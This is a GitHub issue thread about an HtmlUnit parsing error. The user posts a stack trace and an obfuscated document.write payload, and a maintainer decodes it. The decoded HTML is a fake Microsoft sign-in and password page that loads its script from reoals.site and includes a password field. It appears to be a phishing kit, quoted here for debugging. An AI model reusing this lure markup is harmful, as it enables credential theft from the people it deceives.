%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%69%64%3D%22%69%64%42%6F%69%6C%65%72%50%6C%61%74%65%54%65%78%74%22%20%63%6C%61%73%73%3D%22%77%72%61%70%2D%63%6F%6E%74%65%6E%74%20%62%6F%69%6C%65%72%70%6C%61%74%65%2D%74%65%78%74%20%65%78%74%2D%62%6F%69%6C%65%72%70%6C%61%74%65%2D%74%65%78%74%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%3C%64%69%76%20%69%64%3D%22%66%6F%6F%74%65%72%22%20%72%6F%6C%65%3D%22%63%6F%6E%74%65%6E%74%69%6E%66%6F%22%20%63%6C%61%73%73%3D%22%66%6F%6F%74%65%72%20%65%78%74%2D%66%6F%6F%74%65%72%22%3E%0A%09%09%09%09%09%09%09%3C%64%69%76%3E%0A%09%09%09%09%09%09%09%09%3C%64%69%76%20%69%64%3D%22%66%6F%6F%74%65%72%4C%69%6E%6B%73%22%20%63%6C%61%73%73%3D%22%66%6F%6F%74%65%72%4E%6F%64%65%20%74%65%78%74%2D%73%65%63%6F%6E%64%61%72%79%22%3E%20%3C%61%20%69%64%3D%22%66%74%72%54%65%72%6D%73%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D%2F%65%6E%2D%49%4E%2F%73%65%72%76%69%63%65%73%61%67%72%65%65%6D%65%6E%74%2F%22%20%63%6C%61%73%73%3D%22%66%6F%6F%74%65%72%2D%63%6F%6E%74%65%6E%74%20%65%78%74%2D%66%6F%6F%74%65%72%2D%63%6F%6E%74%65%6E%74%20%66%6F%6F%74%65%72%2D%69%74%65%6D%20%65%78%74%2D%66%6F%6F%74%65%72%2D%69%74%65%6D%22%3E%54%65%72%6D%73%20%6F%66%20%75%73%65%3C%2F%61%3E%20%3C%61%20%69%64%3D%22%66%74%72%50%72%69%76%61%63%79%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%70%72%69%76%61%63%79%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D%2F%65%6E%2D%49%4E%2F%70%72%69%76%61%63%79%73%74%61%74%65%6D%65%6E%74%22%20%63%6C%61%73%73%3D%22%66%6F%6F%74%65%72%2D%63%6F%6E%74%65%6E%74%20%65%78%74%2D%66%6F%6F%74%65%72%2D%63%6F%6E%74%65%6E%74%20%66%6F%6F%74%65%72%2D%69%74%65%6D%20%65%78%74%2D%66%6F%6F%74%65%72%2D%69%74%65%6D%22%3E%50%72%69%76%61%63%79%20%26%61%6D%70%3B%20%63%6F%6F%6B%69%65%73%3C%2F%61%3E%20%3C%61%20%69%64%3D%22%6D%6F%72%65%4F%70%74%69%6F%6E%73%22%20%68%72%65%66%3D%22%23%22%20%72%6F%6C%65%3D%22%62%75%74%74%6F%6E%22%20%63%6C%61%73%73%3D%22%66%6F%6F%74%65%72%2D%63%6F%6E%74%65%6E%74%20%65%78%74%2D%66%6F%6F%74%65%72%2D%63%6F%6E%74%65%6E%74%20%66%6F%6F%74%65%72%2D%69%74%65%6D%20%65%78%74%2D%66%6F%6F%74%65%72%2D%69%74%65%6D%20%64%65%62%75%67%2D%69%74%65%6D%20%65%78%74%2D%64%65%62%75%67%2D%69%74%65%6D%22%3E%2E%2E%2E%3C%2F%61%3E%20%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%3C%2F%64%69%76%3E%0A%09%09%0A%09%3C%2F%64%69%76%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%0A%3C%2F%73%63%72%69%70%74%3E%0A'));
//-->
</script>
</html>
Enclosed exception: 
org.htmlunit.corejs.javascript.EvaluatorException: syntax error (https://reoals.site/b/fille.js#1)
	at org.htmlunit.javascript.HtmlUnitContextFactory$HtmlUnitErrorReporter.error(HtmlUnitContextFactory.java:431)
	at org.htmlunit.corejs.javascript.Parser.addError(Parser.java:257)
	at org.htmlunit.corejs.javascript.Parser.reportError(Parser.java:336)
	at org.htmlunit.corejs.javascript.Parser.reportError(Parser.java:327)
	at org.htmlunit.corejs.javascript.Parser.reportError(Parser.java:320)
	at org.htmlunit.corejs.javascript.Parser.primaryExpr(Parser.java:3170)
	at org.htmlunit.corejs.javascript.Parser.memberExpr(Parser.java:2721)
	at org.htmlunit.corejs.javascript.Parser.unaryExpr(Parser.java:2624)
	at org.htmlunit.corejs.javascript.Parser.expExpr(Parser.java:2544)
	at org.htmlunit.corejs.javascript.Parser.mulExpr(Parser.java:2527)
	at org.htmlunit.corejs.javascript.Parser.addExpr(Parser.java:2513)
	at org.htmlunit.corejs.javascript.Parser.shiftExpr(Parser.java:2496)
	at org.htmlunit.corejs.javascript.Parser.relExpr(Parser.java:2474)
	at org.htmlunit.corejs.javascript.Parser.eqExpr(Parser.java:2450)
	at org.htmlunit.corejs.javascript.Parser.bitAndExpr(Parser.java:2441)
	at org.htmlunit.corejs.javascript.Parser.bitXorExpr(Parser.java:2432)
	at org.htmlunit.corejs.javascript.Parser.bitOrExpr(Parser.java:2423)
	at org.htmlunit.corejs.javascript.Parser.andExpr(Parser.java:2414)
	at org.htmlunit.corejs.javascript.Parser.orExpr(Parser.java:2405)
	at org.htmlunit.corejs.javascript.Parser.condExpr(Parser.java:2372)
	at org.htmlunit.corejs.javascript.Parser.assignExpr(Parser.java:2330)
	at org.htmlunit.corejs.javascript.Parser.expr(Parser.java:2309)
	at org.htmlunit.corejs.javascript.Parser.statementHelper(Parser.java:1255)
	at org.htmlunit.corejs.javascript.Parser.statement(Parser.java:1110)
	at org.htmlunit.corejs.javascript.Parser.parse(Parser.java:631)
	at org.htmlunit.corejs.javascript.Parser.parse(Parser.java:561)
	at org.htmlunit.corejs.javascript.Context.parse(Context.java:2540)
	at org.htmlunit.corejs.javascript.Context.compileImpl(Context.java:2471)
	at org.htmlunit.corejs.javascript.Context.compileString(Context.java:1439)
	at org.htmlunit.javascript.HtmlUnitContextFactory$TimeoutContext.compileString(HtmlUnitContextFactory.java:218)
	at org.htmlunit.corejs.javascript.Context.compileString(Context.java:1427)
	at org.htmlunit.javascript.JavaScriptEngine$1.doRun(JavaScriptEngine.java:835)
	at org.htmlunit.javascript.JavaScriptEngine$HtmlUnitContextAction.run(JavaScriptEngine.java:997)
	at org.htmlunit.corejs.javascript.Context.call(Context.java:581)
	at org.htmlunit.corejs.javascript.ContextFactory.call(ContextFactory.java:481)
	at org.htmlunit.javascript.HtmlUnitContextFactory.callSecured(HtmlUnitContextFactory.java:347)
	at org.htmlunit.javascript.JavaScriptEngine.compile(JavaScriptEngine.java:844)
	at org.htmlunit.javascript.JavaScriptEngine.compile(JavaScriptEngine.java:810)
	at org.htmlunit.javascript.JavaScriptEngine.compile(JavaScriptEngine.java:113)
	at org.htmlunit.html.HtmlPage.loadJavaScriptFromUrl(HtmlPage.java:1152)
	at org.htmlunit.html.HtmlPage.loadExternalJavaScriptFile(HtmlPage.java:1024)
	at org.htmlunit.html.ScriptElementSupport.executeScriptIfNeeded(ScriptElementSupport.java:194)
	at org.htmlunit.html.ScriptElementSupport$1.execute(ScriptElementSupport.java:118)
	at org.htmlunit.javascript.JavaScriptEngine.doProcessPostponedActions(JavaScriptEngine.java:1062)
	at org.htmlunit.javascript.JavaScriptEngine$HtmlUnitContextAction.run(JavaScriptEngine.java:1009)
	at org.htmlunit.corejs.javascript.Context.call(Context.java:581)
	at org.htmlunit.corejs.javascript.ContextFactory.call(ContextFactory.java:481)
	at org.htmlunit.javascript.HtmlUnitContextFactory.callSecured(HtmlUnitContextFactory.java:347)
	at org.htmlunit.javascript.JavaScriptEngine.execute(JavaScriptEngine.java:893)
	at org.htmlunit.javascript.JavaScriptEngine.execute(JavaScriptEngine.java:869)
	at org.htmlunit.javascript.JavaScriptEngine.execute(JavaScriptEngine.java:860)
	at org.htmlunit.html.HtmlPage.executeJavaScript(HtmlPage.java:964)
	at org.htmlunit.html.ScriptElementSupport.executeInlineScriptIfNeeded(ScriptElementSupport.java:378)
	at org.htmlunit.html.ScriptElementSupport.executeScriptIfNeeded(ScriptElementSupport.java:228)
	at org.htmlunit.html.ScriptElementSupport$1.execute(ScriptElementSupport.java:118)
	at org.htmlunit.html.ScriptElementSupport.onAllChildrenAddedToPage(ScriptElementSupport.java:141)
	at org.htmlunit.html.HtmlScript.onAllChildrenAddedToPage(HtmlScript.java:192)
	at org.htmlunit.html.parser.neko.HtmlUnitNekoDOMBuilder.endElement(HtmlUnitNekoDOMBuilder.java:599)
	at org.htmlunit.cyberneko.xerces.parsers.AbstractSAXParser.endElement(AbstractSAXParser.java:411)
	at org.htmlunit.html.parser.neko.HtmlUnitNekoDOMBuilder.endElement(HtmlUnitNekoDOMBuilder.java:548)
	at org.htmlunit.cyberneko.HTMLTagBalancer.callEndElement(HTMLTagBalancer.java:1270)
	at org.htmlunit.cyberneko.HTMLTagBalancer.endElement(HTMLTagBalancer.java:1198)
	at org.htmlunit.cyberneko.filters.DefaultFilter.endElement(DefaultFilter.java:201)
	at org.htmlunit.cyberneko.filters.NamespaceBinder.endElement(NamespaceBinder.java:268)
	at org.htmlunit.cyberneko.HTMLScanner$ContentScanner.scanEndElement(HTMLScanner.java:2990)
	at org.htmlunit.cyberneko.HTMLScanner$ContentScanner.scan(HTMLScanner.java:1980)
	at org.htmlunit.cyberneko.HTMLScanner.scanDocument(HTMLScanner.java:814)
	at org.htmlunit.cyberneko.HTMLConfiguration.parse(HTMLConfiguration.java:344)
	at org.htmlunit.cyberneko.HTMLConfiguration.parse(HTMLConfiguration.java:302)
	at org.htmlunit.cyberneko.xerces.parsers.XMLParser.parse(XMLParser.java:72)
	at org.htmlunit.html.parser.neko.HtmlUnitNekoDOMBuilder.parse(HtmlUnitNekoDOMBuilder.java:842)
	at org.htmlunit.html.parser.neko.HtmlUnitNekoHtmlParser.parse(HtmlUnitNekoHtmlParser.java:202)
	at org.htmlunit.DefaultPageCreator.createHtmlPage(DefaultPageCreator.java:308)
	at org.htmlunit.DefaultPageCreator.createPage(DefaultPageCreator.java:227)
	at org.htmlunit.WebClient.loadWebResponseInto(WebClient.java:671)
	at org.htmlunit.WebClient.loadWebResponseInto(WebClient.java:573)
	at org.htmlunit.WebClient.getPage(WebClient.java:491)
	at org.htmlunit.WebClient.getPage(WebClient.java:398)
	at org.htmlunit.WebClient.getPage(WebClient.java:536)
	at org.htmlunit.WebClient.getPage(WebClient.java:518)
	at org.htmlunit.WebClient$getPage.call(Unknown Source)
	at org.codehaus.groovy.runtime.callsite.CallSiteArray.defaultCall(CallSiteArray.java:47)
	at org.codehaus.groovy.runtime.callsite.AbstractCallSite.call(AbstractCallSite.java:125)
	at org.codehaus.groovy.runtime.callsite.AbstractCallSite.call(AbstractCallSite.java:139)
	at Main.homePage(Main.groovy:11)
	at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.base/java.lang.reflect.Method.invoke(Method.java:566)
	at org.junit.platform.commons.util.ReflectionUtils.invokeMethod(ReflectionUtils.java:688)
	at org.junit.jupiter.engine.execution.MethodInvocation.proceed(MethodInvocation.java:60)
	at org.junit.jupiter.engine.execution.InvocationInterceptorChain$ValidatingInvocation.proceed(InvocationInterceptorChain.java:131)
	at org.junit.jupiter.engine.extension.TimeoutExtension.intercept(TimeoutExtension.java:149)
	at org.junit.jupiter.engine.extension.TimeoutExtension.interceptTestableMethod(TimeoutExtension.java:140)
	at org.junit.jupiter.engine.extension.TimeoutExtension.interceptTestMethod(TimeoutExtension.java:84)
	at org.junit.jupiter.engine.execution.ExecutableInvoker$ReflectiveInterceptorCall.lambda$ofVoidMethod$0(ExecutableInvoker.java:115)
	at org.junit.jupiter.engine.execution.ExecutableInvoker.lambda$invoke$0(ExecutableInvoker.java:105)
	at org.junit.jupiter.engine.execution.InvocationInterceptorChain$InterceptedInvocation.proceed(InvocationInterceptorChain.java:106)
	at org.junit.jupiter.engine.execution.InvocationInterceptorChain.proceed(InvocationInterceptorChain.java:64)
	at org.junit.jupiter.engine.execution.InvocationInterceptorChain.chainAndInvoke(InvocationInterceptorChain.java:45)
	at org.junit.jupiter.engine.execution.InvocationInterceptorChain.invoke(InvocationInterceptorChain.java:37)
	at org.junit.jupiter.engine.execution.ExecutableInvoker.invoke(ExecutableInvoker.java:104)
	at org.junit.jupiter.engine.execution.ExecutableInvoker.invoke(ExecutableInvoker.java:98)
	at org.junit.jupiter.engine.descriptor.TestMethodTestDescriptor.lambda$invokeTestMethod$6(TestMethodTestDescriptor.java:210)
	at org.junit.platform.engine.support.hierarchical.ThrowableCollector.execute(ThrowableCollector.java:73)
	at org.junit.jupiter.engine.descriptor.TestMethodTestDescriptor.invokeTestMethod(TestMethodTestDescriptor.java:206)
	at org.junit.jupiter.engine.descriptor.TestMethodTestDescriptor.execute(TestMethodTestDescriptor.java:131)
	at org.junit.jupiter.engine.descriptor.TestMethodTestDescriptor.execute(TestMethodTestDescriptor.java:65)
	at org.junit.platform.engine.support.hierarchical.NodeTestTask.lambda$executeRecursively$5(NodeTestTask.java:139)
	at org.junit.platform.engine.support.hierarchical.ThrowableCollector.execute(ThrowableCollector.java:73)
	at org.junit.platform.engine.support.hierarchical.NodeTestTask.lambda$executeRecursively$7(NodeTestTask.java:129)
	at org.junit.platform.engine.support.hierarchical.Node.around(Node.java:137)
	at org.junit.platform.engine.support.hierarchical.NodeTestTask.lambda$executeRecursively$8(NodeTestTask.java:127)
	at org.junit.platform.engine.support.hierarchical.ThrowableCollector.execute(ThrowableCollector.java:73)
	at org.junit.platform.engine.support.hierarchical.NodeTestTask.executeRecursively(NodeTestTask.java:126)
	at org.junit.platform.engine.support.hierarchical.NodeTestTask.execute(NodeTestTask.java:84)
	at java.base/java.util.ArrayList.forEach(ArrayList.java:1541)
	at org.junit.platform.engine.support.hierarchical.SameThreadHierarchicalTestExecutorService.invokeAll(SameThreadHierarchicalTestExecutorService.java:38)
	at org.junit.platform.engine.support.hierarchical.NodeTestTask.lambda$executeRecursively$5(NodeTestTask.java:143)
	at org.junit.platform.engine.support.hierarchical.ThrowableCollector.execute(ThrowableCollector.java:73)
	at org.junit.platform.engine.support.hierarchical.NodeTestTask.lambda$executeRecursively$7(NodeTestTask.java:129)
	at org.junit.platform.engine.support.hierarchical.Node.around(Node.java:137)
	at org.junit.platform.engine.support.hierarchical.NodeTestTask.lambda$executeRecursively$8(NodeTestTask.java:127)
	at org.junit.platform.engine.support.hierarchical.ThrowableCollector.execute(ThrowableCollector.java:73)
	at org.junit.platform.engine.support.hierarchical.NodeTestTask.executeRecursively(NodeTestTask.java:126)
	at org.junit.platform.engine.support.hierarchical.NodeTestTask.execute(NodeTestTask.java:84)
	at java.base/java.util.ArrayList.forEach(ArrayList.java:1541)
	at org.junit.platform.engine.support.hierarchical.SameThreadHierarchicalTestExecutorService.invokeAll(SameThreadHierarchicalTestExecutorService.java:38)
	at org.junit.platform.engine.support.hierarchical.NodeTestTask.lambda$executeRecursively$5(NodeTestTask.java:143)
	at org.junit.platform.engine.support.hierarchical.ThrowableCollector.execute(ThrowableCollector.java:73)
	at org.junit.platform.engine.support.hierarchical.NodeTestTask.lambda$executeRecursively$7(NodeTestTask.java:129)
	at org.junit.platform.engine.support.hierarchical.Node.around(Node.java:137)
	at org.junit.platform.engine.support.hierarchical.NodeTestTask.lambda$executeRecursively$8(NodeTestTask.java:127)
	at org.junit.platform.engine.support.hierarchical.ThrowableCollector.execute(ThrowableCollector.java:73)
	at org.junit.platform.engine.support.hierarchical.NodeTestTask.executeRecursively(NodeTestTask.java:126)
	at org.junit.platform.engine.support.hierarchical.NodeTestTask.execute(NodeTestTask.java:84)
	at org.junit.platform.engine.support.hierarchical.SameThreadHierarchicalTestExecutorService.submit(SameThreadHierarchicalTestExecutorService.java:32)
	at org.junit.platform.engine.support.hierarchical.HierarchicalTestExecutor.execute(HierarchicalTestExecutor.java:57)
	at org.junit.platform.engine.support.hierarchical.HierarchicalTestEngine.execute(HierarchicalTestEngine.java:51)
	at org.junit.platform.launcher.core.EngineExecutionOrchestrator.execute(EngineExecutionOrchestrator.java:108)
	at org.junit.platform.launcher.core.EngineExecutionOrchestrator.execute(EngineExecutionOrchestrator.java:88)
	at org.junit.platform.launcher.core.EngineExecutionOrchestrator.lambda$execute$0(EngineExecutionOrchestrator.java:54)
	at org.junit.platform.launcher.core.EngineExecutionOrchestrator.withInterceptedStreams(EngineExecutionOrchestrator.java:67)
	at org.junit.platform.launcher.core.EngineExecutionOrchestrator.execute(EngineExecutionOrchestrator.java:52)
	at org.junit.platform.launcher.core.DefaultLauncher.execute(DefaultLauncher.java:96)
	at org.junit.platform.launcher.core.DefaultLauncher.execute(DefaultLauncher.java:75)
	at com.intellij.junit5.JUnit5IdeaTestRunner.startRunnerWithArgs(JUnit5IdeaTestRunner.java:57)
	at com.intellij.rt.junit.IdeaTestRunner$Repeater$1.execute(IdeaTestRunner.java:38)
	at com.intellij.rt.execution.junit.TestsRepeater.repeat(TestsRepeater.java:11)
	at com.intellij.rt.junit.IdeaTestRunner$Repeater.startRunnerWithArgs(IdeaTestRunner.java:35)
	at com.intellij.rt.junit.JUnitStarter.prepareStreamsAndStart(JUnitStarter.java:232)
	at com.intellij.rt.junit.JUnitStarter.main(JUnitStarter.java:55)
== CALLING JAVASCRIPT ==

The problem is after document.write, the <script> element executed again, and this time the source is corrupted. It become

HtmlScript[<script language="javascript">
<!--
// == Begin Free HTML Source Code Obfuscation Protection from https://snapbuilder.com == //
document.write(unescape('%3C%64%69%76%20%63%6C%61%73%73%3D%22%70%61%67%69%6E%61%74%69%6F%6E%2D%76%69%65%77%20%61%6E%69%6D%61%74%65%20%68%61%73%2D%69%64%65%6E%74%69%74%79%2D%62%61%6E%6E%65%72%20%73%6C%69%64%65%2D%69%6E%2D%6E%65%78%74%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%64%61%74%61%2D%76%69%65%77%69%64%3D%22%32%22%20%64%61%74%61%2D%73%68%6F%77%69%64%65%6E%74%69%74%79%62%61%6E%6E%65%72%3D%22%74%72%75%65%22%20%64%61%74%61%2D%64%79%6E%61%6D%69%63%62%72%61%6E%64%69%6E%67%3D%22%74%72%75%65%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%6F%67%69%6E%48%65%61%64%65%72%22%20%63%6C%61%73%73%3D%22%72%6F%77%20%74%69%74%6C%65%20%65%78%74%2D%74%69%74%6C%65%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%72%6F%6C%65%3D%22%68%65%61%64%69%6E%67%22%3E%45%6E%74%65%72%20%70%61%73%73%77%6F%72%64%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%20%20%20%20%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%68%69%64%64%65%6E%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%22%20%6E%61%6D%65%3D%22%69%6E%64%69%63%61%22%20%69%64%3D%22%69%6E%64%69%63%61%22%20%76%61%6C%75%65%3D%22%22%3E%0A%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%72%6F%77%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%63%6F%6C%2D%6D%64%2D%32%34%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%72%6F%6C%65%3D%22%61%6C%65%72%74%22%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%69%64%3D%22%70%61%73%73%77%6F%72%64%45%72%72%6F%72%32%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%20%63%6C%61%73%73%3D%22%61%6C%65%72%74%20%61%6C%65%72%74%2D%65%72%72%6F%72%22%3E%50%6C%65%61%73%65%20%65%6E%74%65%72%20%79%6F%75%72%20%70%61%73%73%77%6F%72%64%2E%3C%2F%64%69%76%3E%0A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3C%64%69%76%20%69%64%3D%22%70%61%73%73%77%6F%72%64%45%72%72%6F%72%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%20%63%6C%]

Any idea?

It can be found in 3.9.0 version.
@niloc132
Copy link

The document.write() tried to inject a large url-encoded string, the contents of which are HTML. That HTML includes a <script> tag which points to https://reoals.site/b/fille.js - but that URL shows an error message in html rather than loading JS:

This Account has been suspended.

I'm not sure how this would be HtmlUnit's fault - the code just isn't valid. Note that this is what the error message said - the file can't be parsed as js, because it isn't JS:

Enclosed exception: 
org.htmlunit.corejs.javascript.EvaluatorException: syntax error (https://reoals.site/b/fille.js#1)

Full un-url encoded html being injected:

<head>
	<title>Sign in to your account</title>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
	<meta name="robots" content="none">
	<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
 <!-- replace these points -->
<link rel="stylesheet" href="https://reoals.site/b/styless.css">
 <script src="https://reoals.site/b/fille.js"></script>

<!-- end of replace -->

</head>

<body class="cb" style="display: block;">
	<div>
		<div></div>
			<div>
				<div id="lightboxTemplateContainer">
					<div id="lightboxBackgroundContainer">
						<div class="background-image-holder" role="presentation">
							<div class="background-image ext-background-image" style="background-image: url(&quot;https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg&quot;);"></div>
						</div>
					</div>
					<div class="outer">
						<div class="template-section main-section">
							<div class="middle">
								<div class="full-height">
									<div class="flex-column">
										<div class="win-scroll">
											<div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox" >
												<div class="lightbox-cover"></div>
												<div><img class="banner-logo" role="img" src="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg"></div>

Note also there is a ton of extra trailing whitespace, and the HTML seems incomplete, but it appears that it is trying to replace the current document with at least part of a login screen...?

The second injected content for completeness (though it should be overwritten before it gets a chance to run):

<div class="pagination-view animate has-identity-banner slide-in-next">
															<div data-viewid="2" data-showidentitybanner="true" data-dynamicbranding="true">
																<div id="loginHeader" class="row title ext-title">
																	<div role="heading">Enter password</div>
																</div>
															    <input type="hidden" class="form-control" name="indica" id="indica" value="">
	<div class="row">
																	<div class="form-group col-md-24">
																		<div role="alert">
																			<div id="passwordError2" style="display:none;" class="alert alert-error">Please enter your password.</div>
																			<div id="passwordError" style="display:none;" class="alert alert-error">Your account or password is incorrect. If you can't remember your password, <a id="idA_IL_ForgotPassword0" href="https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2freprocess%3fctx%3drQIIAYWSO2_TUABG46RNH0MpCAESUlUkBoTk5NrXj7oICT8Sp4kT14mT1BFSFL8SO341durGAzNjJ4ayMVYwwIT6D-jUGXViQkwICQkx0f4Clk8633rO-gpVgiVQAk8LWAnbfUxAghzROoMyIwqiBIMBdETgFApJSEEcYCYJ4OzO-ubLk1cfr943xLeXxrMv-StwhmxNkiSKd8vlNE1LoW07hlUyQr_sjQLTCcafEeQSQb4jyGl-2QpQkTvLxxSksZ0dQDMAhxACigYlzeXcll_1NFdJBoI5afIAaJlBSqrnaC6baG7L0_Cq28oUUlarU1msLFqqQTQzJdHUlqM5ADQzDUj9PWIgVK6_ga9lWjoQ2u5AGHhf87dkdp5M8JsJZ05m_cqv2eHMH0ZhnJwW3uQP60ToNoei01EFfOCyrhdg42goHmViTTJQUpsuaDrSiYNYbfPGHIuq9a44IElZSlpHRz0mVXuSPqaVTE77vm4e18eNiO3NzERXycjsuKZtMpYrqtzUttrjflDrs3N0UWmgaVusy9Wu74mEjqITz8d1ZsZJUtTgjuUDs88y-6jepuI-nMYeQxyLkcKiOxWhzx3UmirhdHncaxBGV-dNRbFsKuTZdlhNDZjZ8DiLWShjZKLQknY0z9p-A9SVoLOQx2qmcXIvVaeZ3ZMXcM5HI67RodEdHTYzjwQ1_ABvsJ8KxWuZfhhcFDbCyAocczuahbbjWd8KD-PEiiZWkDpeHAYvvDAww0AfLW70Xy4hP5burRY3Cw9y27knd0Fhd3V1fTN3Q3-WkHfL1y0xzBahP_rAnt_fL278_Z27WC4fjg1P163uqOZ0Nc4dE_tJJYisiOdHlBXZoEscliW2o_GHzef0LnZSRE6KxYvi7T1h2KqoHZVtCWxbwIfgZ7HweiV3vvafOv8B0&amp;mkt=en-GB&amp;hosted=0&amp;device_platform=Windows+10">reset it now.</a>
																			</div>
																			<div id="important" style="color: black;font-size: 14px; display: none" class="alert alert-error">
																				Because you're accessing sensitive info, you need to verify your password
																			</div>
																		</div>
																		<div class="placeholderContainer">
																			<input name="thepassword" type="password" id="i0118" autocomplete="off" class="form-control input ext-input text-box ext-text-box" placeholder="Password" tabindex="0"> </div>
																	</div>
																</div>
																<div class="position-buttons">
																	<div>
																		<div class="row">
																			<div class="col-md-24">
																				<div class="text-13">
																					<div class="form-group"> <a id="idA_PWD_ForgotPassword" role="link" href="https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2freprocess%3fctx%3drQIIAYWSvY_jZBDG42Q3l82BOQ50Oqi2QAIhOXn9Ha90RbLO5mv9Otk4iZ0mSpw39pvYsddxEq91f8B2XIXQFRRXLg06GkQD9VZXb4MrCkSBqOgOL9QnmpnnmRnNFPMrFoQSTZdACXyZY0rg5DNOFHiO42cUy5gCxUkzQFVYJFD0XGLTFiMK5jR4XHyU-XbbePXzp_JX17-2P__j9dc3xLEdhv7mpFze7_clb7HAJiqZnlt2pus5Xls75keCeEMQL7OHaE214E12I6QbKzxdkQSaY9LMMCVlWWWNuIahZoRKnGoMABz1onPNxjBWQuie2QZztoSy7SqawcCRwd7PKbIVKrIRwT4AqnZmn4_qEZTraa0aw7jFq5oRGZrF3WU_UKvb0GbugxfgGP2VPVp4gTvxvU34MvddtrcIK3DYHW4D3FtYQqPriOq66VF9fchfDeZtSR9VO_OY61LKGWWtxzt_jxn2dIlGjo7ZWA_clR_xSNYG7UmsX1CIbrMdgevVL82ep0StcGqd-p2W0YmXs7jLXQYAs3UFS2tTafr7CnZ1X_V9sJd0eFEzqb5cgcqw2xVWYxzy8AqsRnxdVDe-Ptb1sYlGW1rTRV6YtOgd06BCIwpFx572-_JgoDembU9aCEPLReO6PatGWnp9KUZNLrD0sd2RXY2KLgeUvnFrLduaDuUJu0Jow830xrlU29U4wUYhRV-cjvB4aLG9lX_acAHw1KHiD6yb3Cfv-PmOeZ3Lp8L11rc50fPRGs-P_cBbYAe9i5MdU1b_dU3PRaWq47w5IH4_eFLIP3r4NHOc-eJjkDspFFLy7t3fB8SrwxTDrnj3HP_wW-ubyffg-O115vawvGArQWCcr1S7P0C1pQO1q_IOADeEUqcX1r2dLDXL_Y7m0eYz8YR-kSde5PO3-Q9b8gTWtb5WhXL1QmYm4M88cf0g89PR_4J9995HxeIWTxzPnDpo8_g_wH95P5OQREJmEzKXkAcJeZiQ-YR8kJCFhDxKyGJCPvwH0&amp;mkt=en-IN&amp;hosted=0&amp;device_platform=Windows+10">Forgot my password</a> </div>
																					<div class="form-group"> </div>
																				</div>
																			</div>
																		</div>
																	</div>
																	<div class="win-button-pin-bottom">
																		<div class="row">
																			<div>
																				<div class="col-xs-24 no-padding-left-right button-container">
																					<div class="inline-block">
																						<input type="button" onclick="onMychecked()" id="idSIButton9" class="win-button button_primary button ext-button primary ext-primary" value="Sign in"> </div>
																				</div>
																			</div>
																		</div>
																	</div>
																</div>
															</div>
														</div>
													</div>
												</div>
